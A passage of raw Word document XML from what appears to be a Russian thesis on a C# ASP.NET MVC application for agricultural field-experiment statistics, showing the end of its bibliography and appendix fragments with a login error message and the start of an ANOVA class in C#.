          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Price M. J. C# 10 and. NET 6–Modern Cross-Platform Development: Build apps, websites, and services with ASP. NET Core 6, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blazor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and EF Core 6 using Visual Studio 2022 and Visual Studio Code. – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Packt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publishing Ltd, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190CF8D" w14:textId="3F665135" w:rsidR="00674F9F" w:rsidRDefault="004D3E4B" w:rsidP="004D3E4B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ciliberti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> J., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ciliberti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> J. Getting the Most from the New Features in ASP. NET Core MVC //ASP. NET Core Recipes: A Problem-Solution Approach. – 2017. – С. 139-170.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346249C" w14:textId="478E98B3" w:rsidR="004D3E4B" w:rsidRDefault="004D3E4B" w:rsidP="004D3E4B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3E4B">
        <w:t>Грибова В. В. и др. Создание жизнеспособных интеллектуальных систем с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3E4B">
        <w:t>управляемыми декларативными компонентами //Информационные и математические</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3E4B">
        <w:t>технологии в науке и управлении. – 2018. – №. 3 (11). – С. 6-17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484F87F" w14:textId="0DFACF2E" w:rsidR="00AA5706" w:rsidRPr="00E258B2" w:rsidRDefault="00AA5706" w:rsidP="004D3E4B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APEXCHARTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Charts</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">]. – </w:t>
      </w:r>
      <w:r>
        <w:t>США</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">, 2024. – </w:t>
      </w:r>
      <w:r>
        <w:t>Текст</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">: https://apexcharts.com/. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>дата обращения: 17.03.2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8B6AB" w14:textId="037E6AF4" w:rsidR="00E258B2" w:rsidRDefault="00E258B2" w:rsidP="00E258B2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Савин И.Ю., Блохин Ю.И. ОБ ОПТИМИЗАЦИИ РАЗМЕЩЕНИЯ СЕТИ ДАТЧИКОВ ИНТЕРНЕТА ВЕЩЕЙ НА ПАХОТНЫХ УГОДЬЯХ / Бюллетень Почвенного института им. В.В. Докучаева. 2022. № 110. С.22-50.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DD523A" w14:textId="77777777" w:rsidR="00C7756E" w:rsidRDefault="00C7756E" w:rsidP="00C7756E">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699FEB70" w14:textId="77777777" w:rsidR="00C7756E" w:rsidRDefault="00C7756E" w:rsidP="00C7756E">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190EB441" w14:textId="1CFF289E" w:rsidR="0093378B" w:rsidRPr="00C7756E" w:rsidRDefault="0093378B" w:rsidP="009F5142">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Доспехов Б.А. Методика полевого опыта / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Агропромиздат</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 1985. – 351с.</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EABAFF" w14:textId="5B7E22DD" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc161568223"/>
      <w:bookmarkStart w:id="54" w:name="_Toc162709248"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ПРИЛОЖЕНИЕ </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>А</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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53"/>
      <w:bookmarkEnd w:id="54"/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F0D0E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514808A" w14:textId="213021DE" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc161568224"/>
      <w:bookmarkStart w:id="56" w:name="_Toc162709249"/>
      <w:r>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Б</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55"/>
      <w:bookmarkEnd w:id="56"/>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F14744" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A273B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">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3A41B1" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A4F54" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="003A41B1" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="003A41B1">
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Неверный</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>пароль</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>логин</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C621F75" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="003A41B1">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lastRenderedPageBreak/>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2BDD8C48" w:rsidR="00CC2EBA" w:rsidRPr="00BD5112" w:rsidRDefault="00CC2EBA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F489F5A" w14:textId="05264A9A" w:rsidR="00CC2EBA" w:rsidRPr="00BD5112" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc162709250"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Г</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>Содержимое</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>работы</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дисперсионного</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anova</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="76C42C11" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>System.Collections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB6F33" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2345EE71" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">namespace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ServerMVC.Infrastructure.Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4CD922A4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112D342" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    public class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A3F511D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17799C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>double[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>] Observations;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A138BA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public int Length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A165C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>double[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>] observations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B087248" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E150A1A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            Observations = observations;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28314809" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            Length = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>observations.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A54AC7" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31326F0A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>this[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>int index]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA95B1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD96F2" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            get =&gt; Observations[index];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30848E44" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            set =&gt; Observations[index] = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852A410" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CE017" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>IEnumerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>GetEnumerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">) =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Observations.GetEnumerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA9DE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    }</w:t>
